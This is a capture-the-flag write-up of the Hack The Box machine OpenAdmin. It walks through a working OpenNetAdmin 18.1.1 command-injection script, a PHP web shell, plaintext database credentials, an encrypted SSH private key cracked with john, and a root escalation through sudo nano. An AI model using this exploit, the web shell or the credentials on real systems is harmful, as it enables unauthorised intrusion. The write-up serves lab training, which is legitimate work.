Hackthebox Openadmin writeup
Information@openadmin:~$
| Column | Details |
|---|---|
| Name | Openadmin |
| IP | 10.10.10.171 |
| Points | 20 |
| Os | Linux |
| Difficulty | Easy |
| Creator | dmw0ng |
| Out On | 4 Jan 2020 |
| Retired on | 2 MAY 2020 |
Brief@openadmin:~$
Gobuster reveals a dir called music which has a OpenNetAdmin 18.1.1 running on it . There is a public exploit available for the version of the Openadmin-portl . And we got an initial shell as www-data.The database_settings.inc.phpfile contains the passowrd for the user jimmy.There are two ways to get shell as joanna one is after analyzing the local high port we can see the code in main.php to read the private keys for the user joanna and after making a request to the to that port/main.php we have encrypted keys for the user joanna and after cracking the keys using john we got passpharse of id_rsa. Second one is we have read and write permissions to the directory internal since the service is running as joanna so we make a .php file containing the php-code for rev shell and after making a request to our file we are joanna.And after logged in as joanna using ssh we can edit a file priv as root using nano . And after priv esc to using nano we are root.
Summary
- Gobuster scan reveals the dir
music - The
/onapage reveals the version ofopenadmin-portalthat is vulnerable to rce - Exploiting the portal to get an initial shell as www-data
- The file
database_settings.inc.phpcontains the password for userjimmy - Login as
jimmy. - There is a
hightport running locally which is serving the content ofinternaldir. - the file main.php have the code to read the
private-ssh-keysof user joanna - And we can
readandwritepermission to the dir internal - The first way to do it is making a request to
/main.phpwhich will give usencryptedid_rsa. - Use
ssh2johnto convert the id_rsa to johncrackablehash - After that we got passpharse of
id_rsaand logged in asjoanna - The second way is make a
executablefile withrev-shellcode in it. - Make a
requestto this file and you will get connection back on your listener . - Got user.txt
Sudo -ltells us that we can edit a file called/opt/privas root using nano.- Executing commands in
nanoto get root shell. - Got root.txt
Pwned
For some really cool writeups follow my brother http://www.whatinfotech.com/
Recon
Nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
➜ openadmin nmap -sC -sV -T4 -oA scans/nmap.full -p- -v openadmin.htb
# Nmap 7.80 scan initiated Fri May 1 11:44:03 2020 as: nmap -sC -sV -T4 -oA scans/nmap.full -p- -v openadmin.htb
Failed to resolve "nmap.full".
Nmap scan report for openadmin.htb (10.10.10.171)
Host is up (0.27s latency).
Not shown: 65510 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May 1 11:55:17 2020 -- 1 IP address (1 host up) scanned in 673.78 seconds
Only two ports are opened 22:ssh and 80:http.So we just need to be focus on port 80
Port-80
The page has default apache page.
Gobuster results
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
➜ ~prashant gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r -k -x "txt,html,php,asp,aspx,jpg" -u http://openadmin.htb
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://openadmin.htb
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,html,php,asp,aspx,jpg
[+] Follow Redir: true
[+] Timeout: 10s
===============================================================
2020/05/01 17:35:23 Starting gobuster
===============================================================
/index.html (Status: 200)
/music (Status: 200)
/artwork (Status: 200)
I got two directories music and artwork .
Music Dir
artwork dir
There is literally nothing on dir artwork.So i just switched to dir music now.
Exploiting openadmin portal
There is a login tab in on home page of Music Dir.Which is in /ona and there is a mention of the version of the portal.The title of the page is OpenNetadmin and the version is 18.1.1 if we look at the exploit-db there is a public exploit available for the current version.
i just copy the exploit and modified it to a little extent
1
2
3
4
5
6
7
#!/bin/bash
URL="http://openadmin.htb/ona/"
while true;do
echo -n "$ "; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
Just the variable URL
And now its time to run….
Got shell as www-data
1
2
3
4
5
6
➜ openadmin ./exploit.sh
$ whoami
www-data
$ hostname
openadmin
$
After some manual enumeration i got a file called database_settings.inc.php in local/config
1
2
3
4
5
$ ls local/config
database_settings.inc.php
motd.txt.example
run_installer
$
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ cat local/config/database_settings.inc.php
<?php
$ona_contexts=array (
'DEFAULT' =>
array (
'databases' =>
array (
0 =>
array (
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
'db_debug' => false,
),
),
'description' => 'Default data context',
'context_color' => '#D3DBFF',
),
);
We got a password here n1nj4W4rri0R!.Maybe its of any user .
There are two users in /home dir
1
2
3
4
5
6
7
$ ls -la /home
total 16
drwxr-xr-x 4 root root 4096 Nov 22 18:00 .
drwxr-xr-x 24 root root 4096 Nov 21 13:41 ..
drwxr-x--- 5 jimmy jimmy 4096 Nov 22 23:15 jimmy
drwxr-x--- 6 joanna joanna 4096 Nov 28 09:37 joanna
$
I can confirm that the password is of user jimmy by logging in to ssh.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
➜ openadmin sshpass -p 'n1nj4W4rri0R!' ssh jimmy@openadmin.htb
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri May 1 13:17:15 UTC 2020
System load: 0.0 Processes: 124
Usage of /: 49.9% of 7.81GB Users logged in: 2
Memory usage: 21% IP address for ens160: 10.10.10.171
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
41 packages can be updated.
12 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri May 1 10:59:39 2020 from 10.10.16.81
jimmy@openadmin:~$
And i am jimmy now.
Privilege-escalation@joanna:~$
After various enumerations i got to know about a dir called internal in /var/www
And there is a high port 52846 running locally.
1
2
3
jimmy@openadmin:~$ ss -nlt
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 128 127.0.0.1:52846 0.0.0.0:*
If we make a request to the 127.0.0.1:52846 using curl since it is already installed in.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
jimmy@openadmin:~$ curl 127.0.0.1:52846
<?
// error_reporting(E_ALL);
// ini_set("display_errors", 1);
?>
<html lang = "en">
<head>
<title>Tutorialspoint.com</title>
<link href = "css/bootstrap.min.css" rel = "stylesheet">
<style>
body {
padding-top: 40px;
padding-bottom: 40px;
background-color: #ADABAB;
}
.form-signin {
max-width: 330px;
padding: 15px;
margin: 0 auto;
color: #017572;
}
.form-signin .form-signin-heading,
.form-signin .checkbox {
margin-bottom: 10px;
}
.form-signin .checkbox {
font-weight: normal;
}
.form-signin .form-control {
position: relative;
height: auto;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
padding: 10px;
font-size: 16px;
}
.form-signin .form-control:focus {
z-index: 2;
}
.form-signin input[type="email"] {
margin-bottom: -1px;
border-bottom-right-radius: 0;
border-bottom-left-radius: 0;
border-color:#017572;
}
.form-signin input[type="password"] {
margin-bottom: 10px;
border-top-left-radius: 0;
border-top-right-radius: 0;
border-color:#017572;
}
h2{
text-align: center;
color: #017572;
}
</style>
</head>
<body>
<h2>Enter Username and Password</h2>
<div class = "container form-signin">
<h2 class="featurette-heading">Login Restricted.<span class="text-muted"></span></h2>
</div> <!-- /container -->
<div class = "container">
<form class = "form-signin" role = "form"
action = "/index.php" method = "post">
<h4 class = "form-signin-heading"></h4>
<input type = "text" class = "form-control"
name = "username"
required autofocus></br>
<input type = "password" class = "form-control"
name = "password" required>
<button class = "btn btn-lg btn-primary btn-block" type = "submit"
name = "login">Login</button>
</form>
</div>
</body>
</html>
The file that is being displayed and executed is /index.php from the dir /var/www/internal . First we need to find out that the service is running as which user ?
there are three files in the dir.
1
2
3
4
5
6
7
jimmy@openadmin:/var/www/internal$ ls -la
total 20
drwxrwx--- 2 jimmy internal 4096 May 1 13:26 .
drwxr-xr-x 4 root root 4096 Nov 22 18:15 ..
-rwxrwxr-x 1 jimmy internal 3229 Nov 22 23:24 index.php
-rwxrwxr-x 1 jimmy internal 185 Nov 23 16:37 logout.php
-rwxrwxr-x 1 jimmy internal 339 Nov 23 17:40 main.php
I have r+w permissions in the dir internal so i can create .php that can execute commands as in cmd= param
1
<?php echo "<pre>"; system($_GET['cmd']); ?>
1
2
3
4
jimmy@openadmin:/var/www/internal$ echo '<?php echo "<pre>"; system($_GET['cmd']); ?>' >> test.php
jimmy@openadmin:/var/www/internal$ curl 127.0.0.1:52846/test.php?cmd=whoami
<pre>joanna
And here we go , We just confirmed that the service is running as joanna
There are two ways to get a shell as joanna as far i did it.
1st method
By grabbing the id_rsa using main.php
the content of the file main.php is following
1
2
3
4
5
6
7
8
9
10
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); };
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
Making a request to main.php.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
jimmy@openadmin:/var/www/internal$ curl 127.0.0.1:52846/main.php
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D
kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----
</pre><html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
We got the encrypted private-ssh-keys.
Cracking the encrypted id_rsa using john
First we need to make a crackable hash of the encrypted id_rsa So john can crack it.
I will be using ssh2john.py you can get it from Here
1
➜ openadmin python2 /usr/share/john/ssh2john.py joanna-id_rsa >> hash-id_rsa
Now its time for john to make some noice.
1
2
3
4
5
6
7
8
9
10
11
12
13
➜ openadmin john hash-id_rsa -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas (joanna-id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:07 DONE (2020-05-01 20:14) 0.1371g/s 1967Kp/s 1967Kc/s 1967KC/sa6_123..*7¡Vamos!
Session completed
we got bloodninjas as the Cracked passpharse
Now its time to login using the key.
1
2
3
4
5
6
7
➜ openadmin chmod 600 joanna-id_rsa
➜ openadmin ssh -i joanna-id_rsa joanna@openadmin.htb
Enter passphrase for key 'joanna-id_rsa':
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
Last login: Fri May 1 11:31:30 2020 from 10.10.16.81
joanna@openadmin:~$
And i am in as joanna.
2nd method
By creating a new php file containing rev-shell
Now as the service is running as joanna and i have r+w permissions in the internal dir. SO we can simply create a .php file that will gives us connection back when we will make a request to it.
i made a 0xprashant.php with the following code.
1
2
3
4
5
<?php
?>
And i make the request
1
jimmy@openadmin:/var/www/internal$ curl 127.0.0.1:52846/0xprashant.php
And on my netcat listener i got shell as joanna.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
➜ prashant nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.171.
Ncat: Connection from 10.10.10.171:55726.
Linux openadmin 4.15.0-70-generic #79-Ubuntu SMP Tue Nov 12 10:36:11 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
14:00:00 up 8:44, 3 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
jimmy pts/0 10.10.14.25 13:57 8.00s 0.05s 0.00s curl 127.0.0.1:52846/0xprashant.php
jimmy pts/1 10.10.14.25 13:17 18:16 0.10s 0.10s -bash
joanna pts/2 10.10.14.25 13:49 2:19 0.05s 0.05s -bash
uid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal)
bash: cannot set terminal process group (1050): Inappropriate ioctl for device
bash: no job control in this shell
joanna@openadmin:/$
Got user.txt
1
2
3
joanna@openadmin:~$ cat user.txt
c9b-------------------------1b5f
joanna@openadmin:~$
Privilege-escalation@root:~$
After getting a full ssh shell as joanna. I run sudo -l to check if i may run any command as root.
1
2
3
4
5
6
joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User joanna may run the following commands on openadmin:
(ALL) NOPASSWD: /bin/nano /opt/priv
so i can edit the file /opt/priv using nano as root.
I searched for nano on Gtfobins
open the file /opt/priv in nano as root (sudo). Now press ctrl+r and then ctrl+x to run commands
The command that i will run will be a bash-rev-shell-cmd
1
joanna@openadmin:~$ sudo nano /opt/priv
and we are in nano and after running ctrl+r we are in file to insert
And now by just hitting a ctrl+x we are ready to execute a command
Hit enter and on our netcat listener we got a shell as root
1
2
3
4
5
6
7
➜ prashant nc -nlvp 2345
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::2345
Ncat: Listening on 0.0.0.0:2345
Ncat: Connection from 10.10.10.171.
Ncat: Connection from 10.10.10.171:54498.
root@openadmin:~#
Got root.txt
1
2
3
4
root@openadmin:/root# cat root.txt
cat root.txt
2f---------------------------b561
root@openadmin:/root#
And we pwned it …….
If u liked the writeup.Support a Poor Student to Get the OSCP-Cert on BuymeaCoffee
If you want to get notified as soon as i upload something new to my
blogSo just click on the bell icon you are seeing on the right side – > and allow pushnotification
Resources
| Topic | Url |
|---|---|
| OpenNetadmin-exploit | Click-Here |
| Gtfobins-nano | Click-Here |
Comments powered by Disqus.